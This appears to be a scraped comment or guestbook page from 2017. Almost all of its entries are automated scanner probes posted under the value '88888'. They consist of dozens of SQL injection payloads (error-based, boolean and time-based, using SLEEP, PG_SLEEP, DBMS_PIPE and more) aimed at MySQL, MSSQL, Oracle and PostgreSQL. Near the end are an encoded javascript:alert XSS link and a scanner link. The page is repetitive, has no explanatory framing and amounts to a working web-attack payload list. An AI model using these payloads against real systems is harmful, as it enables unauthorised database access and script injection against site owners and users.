發表于 - 2017-04-24 02:45:11
發表于 - 2017-04-24 02:45:13
發表于 - 2017-04-24 02:45:32
發表于 - 2017-04-24 02:45:38
發表于 - 2017-04-24 02:45:43
發表于 - 2017-04-24 02:46:05
發表于 - 2017-04-24 02:46:07
發表于 - 2017-04-24 02:46:08
發表于 - 2017-04-24 02:46:09
發表于 - 2017-04-24 02:47:20
發表于 - 2017-04-24 02:49:00
發表于 - 2017-04-24 02:49:30
發表于 - 2017-04-24 02:50:01
發表于 - 2017-04-24 02:50:11
發表于 - 2017-04-24 02:50:41
發表于 - 2017-04-24 02:51:22
發表于 - 2017-04-24 02:51:52
發表于 - 2017-04-24 02:52:02
發表于 - 2017-04-24 02:52:12
發表于 - 2017-04-24 02:52:22
88888 :
88888 發表于 - 2017-04-24 03:04:47
88888 :
88888 發表于 - 2017-04-24 03:04:48
88888 :
88888 發表于 - 2017-04-24 03:04:48
88888 :
88888 發表于 - 2017-04-24 03:04:49
88888 :
88888 發表于 - 2017-04-24 03:04:49
88888 :
88888 發表于 - 2017-04-24 03:04:50
88888 :
88888 發表于 - 2017-04-24 03:04:54
88888 :
88888 發表于 - 2017-04-24 03:04:55
88888 :
88888 發表于 - 2017-04-24 03:04:56
88888 :
88888) AND 1=(UPDATEXML(1,CONCAT(0x5e24,(SELECT 0x5468696E6B3A693A646966666572656E74),0x5e24),1)) AND (9=9 發表于 - 2017-04-24 03:05:00
88888 :
88888 AND 1=(UPDATEXML(1,CONCAT(0x5e24,(SELECT 0x5468696E6B3A693A646966666572656E74),0x5e24),1)) 發表于 - 2017-04-24 03:05:01
88888 :
88888, 1=(UPDATEXML(1,CONCAT(0x5e24,(SELECT 0x5468696E6B3A693A646966666572656E74),0x5e24),1)) 發表于 - 2017-04-24 03:05:02
88888 :
88888 發表于 - 2017-04-24 03:05:02
88888 :
88888 發表于 - 2017-04-24 03:05:03
88888 :
88888 OR 1=(UPDATEXML(1,CONCAT(0x5e24,(SELECT 0x5468696E6B3A693A646966666572656E74),0x5e24),1)) 發表于 - 2017-04-24 03:05:03
88888 :
88888 發表于 - 2017-04-24 03:05:04
88888 :
88888 發表于 - 2017-04-24 03:05:05
88888 :
88888 AND EXTRACTVALUE(1,CONCAT(0x5c,0x7468696E6B3A,(SELECT (CASE WHEN (1222=1222) THEN 1 ELSE 0 END)),0x3A646966666572656E74)) 發表于 - 2017-04-24 03:05:05
88888 :
88888,EXTRACTVALUE(1,CONCAT(0x5c,0x7468696E6B3A,(SELECT (CASE WHEN (1222=1222) THEN 1 ELSE 0 END)),0x3A646966666572656E74)) 發表于 - 2017-04-24 03:05:06
88888 :
88888 發表于 - 2017-04-24 03:05:06
88888 :
88888 發表于 - 2017-04-24 03:05:07
88888) AND 1=(UPDATEXML(1,CONCAT(0x5e24,(SELECT 0x5468696E6B3A693A646966666572656E74),0x5e24),1)) AND (9=9 :
88888 發表于 - 2017-04-24 03:05:07
88888 AND 1=(UPDATEXML(1,CONCAT(0x5e24,(SELECT 0x5468696E6B3A693A646966666572656E74),0x5e24),1)) :
88888 發表于 - 2017-04-24 03:05:08
88888 :
88888) AND EXTRACTVALUE(1,CONCAT(0x5c,0x7468696E6B3A,(SELECT (CASE WHEN (1222=1222) THEN 1 ELSE 0 END)),0x3A646966666572656E74)) AND (9=9 發表于 - 2017-04-24 03:05:09
88888, 1=(UPDATEXML(1,CONCAT(0x5e24,(SELECT 0x5468696E6B3A693A646966666572656E74),0x5e24),1)) :
88888 發表于 - 2017-04-24 03:05:09
88888 :
88888 發表于 - 2017-04-24 03:05:09
88888 OR 1=(UPDATEXML(1,CONCAT(0x5e24,(SELECT 0x5468696E6B3A693A646966666572656E74),0x5e24),1)) :
88888 發表于 - 2017-04-24 03:05:10
88888 :
88888 OR EXTRACTVALUE(1,CONCAT(0x5c,0x7468696E6B3A,(SELECT (CASE WHEN (1222=1222) THEN 1 ELSE 0 END)),0x3A646966666572656E74)) 發表于 - 2017-04-24 03:05:10
88888 :
88888 發表于 - 2017-04-24 03:05:10
88888 AND EXTRACTVALUE(1,CONCAT(0x5c,0x7468696E6B3A,(SELECT (CASE WHEN (1222=1222) THEN 1 ELSE 0 END)),0x3A646966666572656E74)) :
88888 發表于 - 2017-04-24 03:05:11
88888,EXTRACTVALUE(1,CONCAT(0x5c,0x7468696E6B3A,(SELECT (CASE WHEN (1222=1222) THEN 1 ELSE 0 END)),0x3A646966666572656E74)) :
88888 發表于 - 2017-04-24 03:05:12
88888 :
88888 發表于 - 2017-04-24 03:05:13
88888 :
88888) AND 1122=CONVERT(INT,(SELECT CHAR(84)+CHAR(97)+CHAR(105)+CHAR(87)+CHAR(97)+CHAR(110)+CHAR(58)+CHAR(103)+CHAR(111)+CHAR(58)+CHAR(104)+CHAR(111)+CHAR(109)+CHAR(101))) AND (2014=2014 發表于 - 2017-04-24 03:05:13
88888 :
88888 AND 1122=CONVERT(INT,(SELECT CHAR(84)+CHAR(97)+CHAR(105)+CHAR(87)+CHAR(97)+CHAR(110)+CHAR(58)+CHAR(103)+CHAR(111)+CHAR(58)+CHAR(104)+CHAR(111)+CHAR(109)+CHAR(101))) 發表于 - 2017-04-24 03:05:14
88888 :
88888 發表于 - 2017-04-24 03:05:14
88888) AND EXTRACTVALUE(1,CONCAT(0x5c,0x7468696E6B3A,(SELECT (CASE WHEN (1222=1222) THEN 1 ELSE 0 END)),0x3A646966666572656E74)) AND (9=9 :
88888 發表于 - 2017-04-24 03:05:14
88888 :
88888,(SELECT CONVERT(INT,(SELECT CHAR(84)+CHAR(97)+CHAR(105)+CHAR(87)+CHAR(97)+CHAR(110)+CHAR(58)+CHAR(103)+CHAR(111)+CHAR(58)+CHAR(104)+CHAR(111)+CHAR(109)+CHAR(101))) FROM SYSCOLUMNS) 發表于 - 2017-04-24 03:05:15
88888 OR EXTRACTVALUE(1,CONCAT(0x5c,0x7468696E6B3A,(SELECT (CASE WHEN (1222=1222) THEN 1 ELSE 0 END)),0x3A646966666572656E74)) :
88888 發表于 - 2017-04-24 03:05:15
88888 :
88888 發表于 - 2017-04-24 03:05:15
88888 :
88888 OR 1122=CONVERT(INT,(SELECT CHAR(84)+CHAR(97)+CHAR(105)+CHAR(87)+CHAR(97)+CHAR(110)+CHAR(58)+CHAR(103)+CHAR(111)+CHAR(58)+CHAR(104)+CHAR(111)+CHAR(109)+CHAR(101))) 發表于 - 2017-04-24 03:05:16
88888 :
88888 發表于 - 2017-04-24 03:05:16
88888) AND 1122=CONVERT(INT,(SELECT CHAR(84)+CHAR(97)+CHAR(105)+CHAR(87)+CHAR(97)+CHAR(110)+CHAR(58)+CHAR(103)+CHAR(111)+CHAR(58)+CHAR(104)+CHAR(111)+CHAR(109)+CHAR(101))) AND (2014=2014 :
88888 發表于 - 2017-04-24 03:05:17
88888 :
88888 AND 1=CHAR(106)+CHAR(106)+CHAR(106) 發表于 - 2017-04-24 03:05:17
88888 :
88888 發表于 - 2017-04-24 03:05:17
88888 AND 1122=CONVERT(INT,(SELECT CHAR(84)+CHAR(97)+CHAR(105)+CHAR(87)+CHAR(97)+CHAR(110)+CHAR(58)+CHAR(103)+CHAR(111)+CHAR(58)+CHAR(104)+CHAR(111)+CHAR(109)+CHAR(101))) :
88888 發表于 - 2017-04-24 03:05:18
88888 :
88888/**/AND/**/1=CHAR(106)+CHAR(106)+CHAR(106) 發表于 - 2017-04-24 03:05:18
88888 :
88888 發表于 - 2017-04-24 03:05:18
88888,(SELECT CONVERT(INT,(SELECT CHAR(84)+CHAR(97)+CHAR(105)+CHAR(87)+CHAR(97)+CHAR(110)+CHAR(58)+CHAR(103)+CHAR(111)+CHAR(58)+CHAR(104)+CHAR(111)+CHAR(109)+CHAR(101))) FROM SYSCOLUMNS) :
88888 發表于 - 2017-04-24 03:05:19
88888 OR 1122=CONVERT(INT,(SELECT CHAR(84)+CHAR(97)+CHAR(105)+CHAR(87)+CHAR(97)+CHAR(110)+CHAR(58)+CHAR(103)+CHAR(111)+CHAR(58)+CHAR(104)+CHAR(111)+CHAR(109)+CHAR(101))) :
88888 發表于 - 2017-04-24 03:05:20
88888 :
88888) AND 1=CHAR(106)+CHAR(106)+CHAR(106) AND (9=9 發表于 - 2017-04-24 03:05:20
88888 :
88888 發表于 - 2017-04-24 03:05:20
88888 AND 1=CHAR(106)+CHAR(106)+CHAR(106) :
88888 發表于 - 2017-04-24 03:05:21
88888/**/AND/**/1=CHAR(106)+CHAR(106)+CHAR(106) :
88888 發表于 - 2017-04-24 03:05:22
88888 :
88888) AND 1122=(SELECT UPPER(XMLType(CHR(60)||CHR(104)||CHR(107)||CHR(58)||(SELECT (CASE WHEN (1122=1122) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(49)||CHR(57)||CHR(57)||CHR(55))) FROM DUAL) AND (2014=2014 發表于 - 2017-04-24 03:05:22
88888 :
88888 發表于 - 2017-04-24 03:05:23
88888 :
88888 AND 1122=(SELECT UPPER(XMLType(CHR(60)||CHR(104)||CHR(107)||CHR(58)||(SELECT (CASE WHEN (1122=1122) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(49)||CHR(57)||CHR(57)||CHR(55))) FROM DUAL) 發表于 - 2017-04-24 03:05:23
88888) AND 1=CHAR(106)+CHAR(106)+CHAR(106) AND (9=9 :
88888 發表于 - 2017-04-24 03:05:24
88888 :
88888, 1122=(SELECT UPPER(XMLType(CHR(60)||CHR(104)||CHR(107)||CHR(58)||(SELECT (CASE WHEN (1122=1122) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(49)||CHR(57)||CHR(57)||CHR(55))) FROM DUAL) 發表于 - 2017-04-24 03:05:24
88888 :
88888 發表于 - 2017-04-24 03:05:24
88888 :
88888 發表于 - 2017-04-24 03:05:25
88888 :
88888 OR 1122=(SELECT UPPER(XMLType(CHR(60)||CHR(104)||CHR(107)||CHR(58)||(SELECT (CASE WHEN (1122=1122) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(49)||CHR(57)||CHR(57)||CHR(55))) FROM DUAL) 發表于 - 2017-04-24 03:05:25
88888) AND 1122=(SELECT UPPER(XMLType(CHR(60)||CHR(104)||CHR(107)||CHR(58)||(SELECT (CASE WHEN (1122=1122) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(49)||CHR(57)||CHR(57)||CHR(55))) FROM DUAL) AND (2014=2014 :
88888 發表于 - 2017-04-24 03:05:25
88888 :
88888 發表于 - 2017-04-24 03:05:26
88888 AND 1122=(SELECT UPPER(XMLType(CHR(60)||CHR(104)||CHR(107)||CHR(58)||(SELECT (CASE WHEN (1122=1122) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(49)||CHR(57)||CHR(57)||CHR(55))) FROM DUAL) :
88888 發表于 - 2017-04-24 03:05:26
88888, 1122=(SELECT UPPER(XMLType(CHR(60)||CHR(104)||CHR(107)||CHR(58)||(SELECT (CASE WHEN (1122=1122) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(49)||CHR(57)||CHR(57)||CHR(55))) FROM DUAL) :
88888 發表于 - 2017-04-24 03:05:27
88888 :
88888 發表于 - 2017-04-24 03:05:27
88888 :
88888 發表于 - 2017-04-24 03:05:28
88888 OR 1122=(SELECT UPPER(XMLType(CHR(60)||CHR(104)||CHR(107)||CHR(58)||(SELECT (CASE WHEN (1122=1122) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(49)||CHR(57)||CHR(57)||CHR(55))) FROM DUAL) :
88888 發表于 - 2017-04-24 03:05:28
88888 :
88888 發表于 - 2017-04-24 03:05:28
(UPDATEXML(1,CONCAT(0x5e24,(SELECT 0x5468696E6B3A693A646966666572656E74),0x5e24),1)) :
88888 發表于 - 2017-04-24 03:05:29
88888 :
88888 發表于 - 2017-04-24 03:05:29
88888 :
88888 發表于 - 2017-04-24 03:05:29
(EXTRACTVALUE(1,CONCAT(0x5c,0x7468696E6B3A,(SELECT (CASE WHEN (1222=1222) THEN 1 ELSE 0 END)),0x3A646966666572656E74))) :
88888 發表于 - 2017-04-24 03:05:29
88888 :
88888" AND "pc"="8A 發表于 - 2017-04-24 03:05:30
88888 :
88888 發表于 - 2017-04-24 03:05:30
88888 :
88888 發表于 - 2017-04-24 03:05:30
CONVERT(INT,(SELECT CHAR(84)+CHAR(97)+CHAR(105)+CHAR(87)+CHAR(97)+CHAR(110)+CHAR(58)+CHAR(103)+CHAR(111)+CHAR(58)+CHAR(104)+CHAR(111)+CHAR(109)+CHAR(101))) :
88888 發表于 - 2017-04-24 03:05:30
88888 :
88888 發表于 - 2017-04-24 03:05:31
88888 :
88888 發表于 - 2017-04-24 03:05:31
(SELECT UPPER(XMLType(CHR(60)||CHR(104)||CHR(107)||CHR(58)||(SELECT (CASE WHEN (1122=1122) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(49)||CHR(57)||CHR(57)||CHR(55))) FROM DUAL) :
88888 發表于 - 2017-04-24 03:05:31
88888 :
88888 發表于 - 2017-04-24 03:05:31
88888 :
888881 發表于 - 2017-04-24 03:05:31
(SELECT CHAR(116)+CHAR(104)+CHAR(105)+CHAR(110)+CHAR(107)+CHAR(58)+(SELECT (CASE WHEN (1943=1943) THEN CHAR(105) ELSE CHAR(48) END))+CHAR(58)+CHAR(100)+CHAR(105)+CHAR(102)+CHAR(102)+CHAR(101)+CHAR(114)+CHAR(101)+CHAR(110)+CHAR(116)) :
88888 發表于 - 2017-04-24 03:05:31
88888 :
88888 發表于 - 2017-04-24 03:05:32
88888 AND 64=12 :
88888 發表于 - 2017-04-24 03:05:32
88888 :
88888 發表于 - 2017-04-24 03:05:33
88888 :
88888 發表于 - 2017-04-24 03:05:33
88888 AND 19=19 :
88888 發表于 - 2017-04-24 03:05:33
88888 :
88888") AND 91=71 AND ("EZ"="EZ 發表于 - 2017-04-24 03:05:33
88888 :
88888 發表于 - 2017-04-24 03:05:33
88888 AND 645=727 :
88888 發表于 - 2017-04-24 03:05:34
88888 :
88888 發表于 - 2017-04-24 03:05:34
88888 :
88888 發表于 - 2017-04-24 03:05:34
88888 :
88888 發表于 - 2017-04-24 03:05:34
88888 :
88888 發表于 - 2017-04-24 03:05:35
88888 :
88888 發表于 - 2017-04-24 03:05:35
888881 :
88888 發表于 - 2017-04-24 03:05:35
88888 :
88888%") AND 76=16 AND 1 like("% 發表于 - 2017-04-24 03:05:35
88888 :
88888 發表于 - 2017-04-24 03:05:36
88888 :
88888 發表于 - 2017-04-24 03:05:36
88888) AND 36=57 AND (36=36 :
88888 發表于 - 2017-04-24 03:05:36
88888 :
88888 發表于 - 2017-04-24 03:05:36
88888 :
88888 RLIKE (SELECT (CASE WHEN (21=34) THEN 0x34383F636F6D6D656E743D3838383838 ELSE 0x28 END)) 發表于 - 2017-04-24 03:05:37
88888 :
88888 發表于 - 2017-04-24 03:05:37
88888) AND 53=53 AND (53=53 :
88888 發表于 - 2017-04-24 03:05:37
88888 :
88888 RLIKE (SELECT (CASE WHEN (16=16) THEN 0x34383F636F6D6D656E743D3838383838 ELSE 0x28 END)) 發表于 - 2017-04-24 03:05:37
88888 :
88888 發表于 - 2017-04-24 03:05:38
88888) AND 162=153 AND (162=162 :
88888 發表于 - 2017-04-24 03:05:38
88888 :
88888 RLIKE (SELECT (CASE WHEN (219=118) THEN 0x34383F636F6D6D656E743D3838383838 ELSE 0x28 END)) 發表于 - 2017-04-24 03:05:38
88888 :
88888 發表于 - 2017-04-24 03:05:38
88888,(SELECT (CASE WHEN (37=14) THEN 88888 ELSE 1/(SELECT 0) END)) :
88888 發表于 - 2017-04-24 03:05:38
88888 :
88888 發表于 - 2017-04-24 03:05:39
88888 :
88888) RLIKE (SELECT (CASE WHEN (26=41) THEN 0x34383F636F6D6D656E743D3838383838 ELSE 0x28 END)) AND (26=26 發表于 - 2017-04-24 03:05:39
88888,(SELECT (CASE WHEN (35=35) THEN 88888 ELSE 1/(SELECT 0) END)) :
88888 發表于 - 2017-04-24 03:05:39
88888 :
88888 發表于 - 2017-04-24 03:05:39
88888 :
88888) RLIKE (SELECT (CASE WHEN (19=19) THEN 0x34383F636F6D6D656E743D3838383838 ELSE 0x28 END)) AND (58=58 發表于 - 2017-04-24 03:05:40
88888,(SELECT (CASE WHEN (962=916) THEN 88888 ELSE 1/(SELECT 0) END)) :
88888 發表于 - 2017-04-24 03:05:40
88888 :
88888 發表于 - 2017-04-24 03:05:40
88888 :
88888) RLIKE (SELECT (CASE WHEN (541=681) THEN 0x34383F636F6D6D656E743D3838383838 ELSE 0x28 END)) AND (541=541 發表于 - 2017-04-24 03:05:40
88888,IIF(16=11,88888,1/0) :
88888 發表于 - 2017-04-24 03:05:40
88888 :
88888 發表于 - 2017-04-24 03:05:41
88888,IIF(68=68,88888,1/0) :
88888 發表于 - 2017-04-24 03:05:41
88888,IIF(747=543,88888,1/0) :
88888 發表于 - 2017-04-24 03:05:42
88888 :
88888 發表于 - 2017-04-24 03:05:42
88888 :
88888 發表于 - 2017-04-24 03:05:43
88888 :
88888,(SELECT (CASE WHEN (26=99) THEN 0x34383F636F6D6D656E743D3838383838 ELSE 26*(SELECT 26 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) 發表于 - 2017-04-24 03:05:43
(SELECT (CASE WHEN (15=11) THEN 88888 ELSE 1/(SELECT 0) END)) :
88888 發表于 - 2017-04-24 03:05:43
88888 :
88888,(SELECT (CASE WHEN (94=94) THEN 0x34383F636F6D6D656E743D3838383838 ELSE 94*(SELECT 94 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) 發表于 - 2017-04-24 03:05:44
88888 :
88888 發表于 - 2017-04-24 03:05:44
(SELECT (CASE WHEN (24=24) THEN 88888 ELSE 1/(SELECT 0) END)) :
88888 發表于 - 2017-04-24 03:05:44
88888 :
88888,(SELECT (CASE WHEN (213=177) THEN 0x34383F636F6D6D656E743D3838383838 ELSE 213*(SELECT 213 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) 發表于 - 2017-04-24 03:05:44
(SELECT (CASE WHEN (291=783) THEN 88888 ELSE 1/(SELECT 0) END)) :
88888 發表于 - 2017-04-24 03:05:45
88888 :
88888 發表于 - 2017-04-24 03:05:45
88888 :
88888,(SELECT (CASE WHEN (61=16) THEN 0x34383F636F6D6D656E743D3838383838 ELSE 61*(SELECT 61 FROM mysql.db) END)) 發表于 - 2017-04-24 03:05:45
88888 :
88888 發表于 - 2017-04-24 03:05:45
IIF(27=61,88888,1/0) :
88888 發表于 - 2017-04-24 03:05:45
88888 :
88888,(SELECT (CASE WHEN (63=63) THEN 0x34383F636F6D6D656E743D3838383838 ELSE 63*(SELECT 63 FROM mysql.db) END)) 發表于 - 2017-04-24 03:05:46
IIF(63=63,88888,1/0) :
88888 發表于 - 2017-04-24 03:05:46
88888 :
88888,(SELECT (CASE WHEN (417=124) THEN 0x34383F636F6D6D656E743D3838383838 ELSE 417*(SELECT 417 FROM mysql.db) END)) 發表于 - 2017-04-24 03:05:46
88888 :
88888 發表于 - 2017-04-24 03:05:46
IIF(954=791,88888,1/0) :
88888 發表于 - 2017-04-24 03:05:47
88888 :
88888,(SELECT (CASE WHEN (67=76) THEN 0x34383F636F6D6D656E743D3838383838 ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL) 發表于 - 2017-04-24 03:05:47
88888 :
88888 發表于 - 2017-04-24 03:05:47
88888 :
88888,(SELECT (CASE WHEN (64=64) THEN 0x34383F636F6D6D656E743D3838383838 ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL) 發表于 - 2017-04-24 03:05:47
(43=31)*88888 :
88888 發表于 - 2017-04-24 03:05:47
88888 :
88888 發表于 - 2017-04-24 03:05:48
88888 :
88888,(SELECT (CASE WHEN (866=864) THEN 0x34383F636F6D6D656E743D3838383838 ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL) 發表于 - 2017-04-24 03:05:48
(18=18)*88888 :
88888 發表于 - 2017-04-24 03:05:48
88888 :
88888 發表于 - 2017-04-24 03:05:49
(153=438)*88888 :
88888 發表于 - 2017-04-24 03:05:49
88888 :
88888 發表于 - 2017-04-24 03:05:49
88888 :
88888 發表于 - 2017-04-24 03:05:50
88888 :
88888 發表于 - 2017-04-24 03:05:50
88888" AND "T4"="Nk :
88888 發表于 - 2017-04-24 03:05:51
88888 :
88888 發表于 - 2017-04-24 03:05:51
88888 :
88888 發表于 - 2017-04-24 03:05:51
88888 :
88888 發表于 - 2017-04-24 03:05:52
88888") AND 64=18 AND ("J8"="J8 :
88888 發表于 - 2017-04-24 03:05:52
88888 :
88888 發表于 - 2017-04-24 03:05:53
88888 :
88888 發表于 - 2017-04-24 03:05:53
88888 :
88888 發表于 - 2017-04-24 03:05:53
88888 :
88888 發表于 - 2017-04-24 03:05:54
88888%") AND 44=97 AND 1 like("% :
88888 發表于 - 2017-04-24 03:05:54
88888 :
88888 發表于 - 2017-04-24 03:05:54
88888 :
88888 發表于 - 2017-04-24 03:05:54
88888 RLIKE (SELECT (CASE WHEN (35=27) THEN 88888 ELSE 0x28 END)) :
88888 發表于 - 2017-04-24 03:05:55
88888 :
88888 AND SLEEP(5) 發表于 - 2017-04-24 03:05:55
88888 :
88888 發表于 - 2017-04-24 03:05:55
88888 RLIKE (SELECT (CASE WHEN (31=31) THEN 88888 ELSE 0x28 END)) :
88888 發表于 - 2017-04-24 03:05:55
88888 :
88888AND (SELECT * FROM (SELECT(SLEEP(5)))uttes) 發表于 - 2017-04-24 03:05:56
88888) RLIKE (SELECT (CASE WHEN (51=13) THEN 88888 ELSE 0x28 END)) AND (51=51 :
88888 發表于 - 2017-04-24 03:05:56
88888) RLIKE (SELECT (CASE WHEN (46=46) THEN 88888 ELSE 0x28 END)) AND (61=61 :
88888 發表于 - 2017-04-24 03:05:57
88888 :
88888 發表于 - 2017-04-24 03:05:57
88888 :
88888 AND 5=SLEEP(5) 發表于 - 2017-04-24 03:05:57
88888 :
88888 發表于 - 2017-04-24 03:05:58
88888 :
88888 OR 5=SLEEP(5) 發表于 - 2017-04-24 03:05:58
88888 :
88888 發表于 - 2017-04-24 03:05:58
88888,(SELECT (CASE WHEN (91=92) THEN 88888 ELSE 91*(SELECT 91 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) :
88888 發表于 - 2017-04-24 03:05:59
88888 :
88888) AND SLEEP(5) AND (9=9 發表于 - 2017-04-24 03:05:59
88888 :
88888 發表于 - 2017-04-24 03:05:59
88888,(SELECT (CASE WHEN (61=61) THEN 88888 ELSE 61*(SELECT 61 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) :
88888 發表于 - 2017-04-24 03:05:59
88888 :
88888 發表于 - 2017-04-24 03:06:00
88888 :
88888 OR 5=SLEEP(5) 發表于 - 2017-04-24 03:06:00
88888,(SELECT (CASE WHEN (82=72) THEN 88888 ELSE 82*(SELECT 82 FROM mysql.db) END)) :
88888 發表于 - 2017-04-24 03:06:00
88888 :
88888 發表于 - 2017-04-24 03:06:00
88888 :
88888,(SELECT (CASE WHEN (5=5) THEN SLEEP(5) ELSE 5*(SELECT 5 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) 發表于 - 2017-04-24 03:06:00
88888,(SELECT (CASE WHEN (34=34) THEN 88888 ELSE 34*(SELECT 34 FROM mysql.db) END)) :
88888 發表于 - 2017-04-24 03:06:01
88888 :
88888 發表于 - 2017-04-24 03:06:01
88888,(SELECT (CASE WHEN (15=56) THEN 88888 ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL) :
88888 發表于 - 2017-04-24 03:06:01
88888 :
88888 AND 1997=DBMS_PIPE.RECEIVE_MESSAGE(CHR(115)||CHR(99)||CHR(97)||CHR(100),5) 發表于 - 2017-04-24 03:06:02
88888 :
88888 發表于 - 2017-04-24 03:06:02
88888,(SELECT (CASE WHEN (39=39) THEN 88888 ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL) :
88888 發表于 - 2017-04-24 03:06:02
88888 :
88888 發表于 - 2017-04-24 03:06:02
88888 :
88888 OR 1997=DBMS_PIPE.RECEIVE_MESSAGE(CHR(115)||CHR(99)||CHR(97)||CHR(100),5) 發表于 - 2017-04-24 03:06:02
(SELECT (CASE WHEN (92=66) THEN 88888 ELSE 92*(SELECT 92 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) :
88888 發表于 - 2017-04-24 03:06:03
88888 :
88888 發表于 - 2017-04-24 03:06:03
(SELECT (CASE WHEN (36=36) THEN 88888 ELSE 36*(SELECT 36 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) :
88888 發表于 - 2017-04-24 03:06:03
88888 :
88888 AND PG_SLEEP(5) 發表于 - 2017-04-24 03:06:03
MAKE_SET(69=39,88888) :
88888 發表于 - 2017-04-24 03:06:04
88888 :
88888 發表于 - 2017-04-24 03:06:04
88888 :
88888 AND 1997=PG_SLEEP(5) 發表于 - 2017-04-24 03:06:04
MAKE_SET(57=57,88888) :
88888 發表于 - 2017-04-24 03:06:04
88888 :
88888 發表于 - 2017-04-24 03:06:04
88888 :
88888AND 1997=(SELECT 5 FROM PG_SLEEP(5)) 發表于 - 2017-04-24 03:06:05
88888 :
88888 發表于 - 2017-04-24 03:06:05
ELT(15=73,88888) :
88888 發表于 - 2017-04-24 03:06:05
88888 :
88888 發表于 - 2017-04-24 03:06:06
88888 :
88888 發表于 - 2017-04-24 03:06:06
ELT(46=46,88888) :
88888 發表于 - 2017-04-24 03:06:06
88888 :
88888 發表于 - 2017-04-24 03:06:06
88888 :
88888 發表于 - 2017-04-24 03:06:06
88888 :
88888 發表于 - 2017-04-24 03:06:07
88888 :
888881 發表于 - 2017-04-24 03:06:07
(SELECT (CASE WHEN (39=64) THEN 88888 ELSE 39*(SELECT 39 FROM mysql.db) END)) :
88888 發表于 - 2017-04-24 03:06:07
88888 :
88888 發表于 - 2017-04-24 03:06:08
(SELECT (CASE WHEN (33=33) THEN 88888 ELSE 33*(SELECT 33 FROM mysql.db) END)) :
88888 發表于 - 2017-04-24 03:06:08
88888 :
88888 發表于 - 2017-04-24 03:06:08
(SELECT (CASE WHEN (22=14) THEN 88888 ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL) :
88888 發表于 - 2017-04-24 03:06:09
88888 :
88888 發表于 - 2017-04-24 03:06:09
(SELECT (CASE WHEN (41=41) THEN 88888 ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL) :
88888 發表于 - 2017-04-24 03:06:09
88888 :
88888 發表于 - 2017-04-24 03:06:10
88888 :
88888 發表于 - 2017-04-24 03:06:10
88888 :
88888 發表于 - 2017-04-24 03:06:10
88888 AND SLEEP(5) :
88888 發表于 - 2017-04-24 03:06:11
88888 :
88888 發表于 - 2017-04-24 03:06:11
88888AND (SELECT * FROM (SELECT(SLEEP(5)))uttes) :
88888 發表于 - 2017-04-24 03:06:11
88888 :
88888 發表于 - 2017-04-24 03:06:12
88888 AND 5=SLEEP(5) :
88888 發表于 - 2017-04-24 03:06:13
88888 :
88888 發表于 - 2017-04-24 03:06:13
88888 OR 5=SLEEP(5) :
88888 發表于 - 2017-04-24 03:06:13
88888 :
88888 發表于 - 2017-04-24 03:06:14
88888) AND SLEEP(5) AND (9=9 :
88888 發表于 - 2017-04-24 03:06:14
88888 :
88888 發表于 - 2017-04-24 03:06:15
88888 OR 5=SLEEP(5) :
88888 發表于 - 2017-04-24 03:06:15
88888 :
88888 發表于 - 2017-04-24 03:06:16
88888,(SELECT (CASE WHEN (5=5) THEN SLEEP(5) ELSE 5*(SELECT 5 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) :
88888 發表于 - 2017-04-24 03:06:16
88888 :
88888 發表于 - 2017-04-24 03:06:17
88888 AND 1997=DBMS_PIPE.RECEIVE_MESSAGE(CHR(115)||CHR(99)||CHR(97)||CHR(100),5) :
88888 發表于 - 2017-04-24 03:06:17
88888 :
88888 發表于 - 2017-04-24 03:06:18
88888 OR 1997=DBMS_PIPE.RECEIVE_MESSAGE(CHR(115)||CHR(99)||CHR(97)||CHR(100),5) :
88888 發表于 - 2017-04-24 03:06:18
88888 :
88888 發表于 - 2017-04-24 03:06:18
88888 AND PG_SLEEP(5) :
88888 發表于 - 2017-04-24 03:06:19
88888 :
88888 發表于 - 2017-04-24 03:06:19
88888 AND 1997=PG_SLEEP(5) :
88888 發表于 - 2017-04-24 03:06:19
88888 :
88888 發表于 - 2017-04-24 03:06:20
88888AND 1997=(SELECT 5 FROM PG_SLEEP(5)) :
88888 發表于 - 2017-04-24 03:06:20
88888 :
88888 發表于 - 2017-04-24 03:06:21
88888 :
88888 發表于 - 2017-04-24 03:06:22
888881 :
88888 發表于 - 2017-04-24 03:06:22
88888 :
88888<a href=&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#97&#108&#101&#114&#116&#40&#49&#50&#51&#52&#53&#41>TEST</a> 發表于 - 2017-04-24 03:07:15
88888 :
88888 發表于 - 2017-04-24 03:07:31
88888<a href=&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#97&#108&#101&#114&#116&#40&#49&#50&#51&#52&#53&#41>TEST</a> :
88888 發表于 - 2017-04-24 03:07:32
88888 :
88888<a href=//webscan.#/>webscan</a> 發表于 - 2017-04-24 03:08:56
88888 :
88888 發表于 - 2017-04-24 03:09:11
88888<a href=//webscan.#/>webscan</a> :
88888 發表于 - 2017-04-24 03:09:12
88888 :
88888%27 發表于 - 2017-04-24 03:09:26
88888 :
88888 發表于 - 2017-04-24 03:09:41
88888%27 :
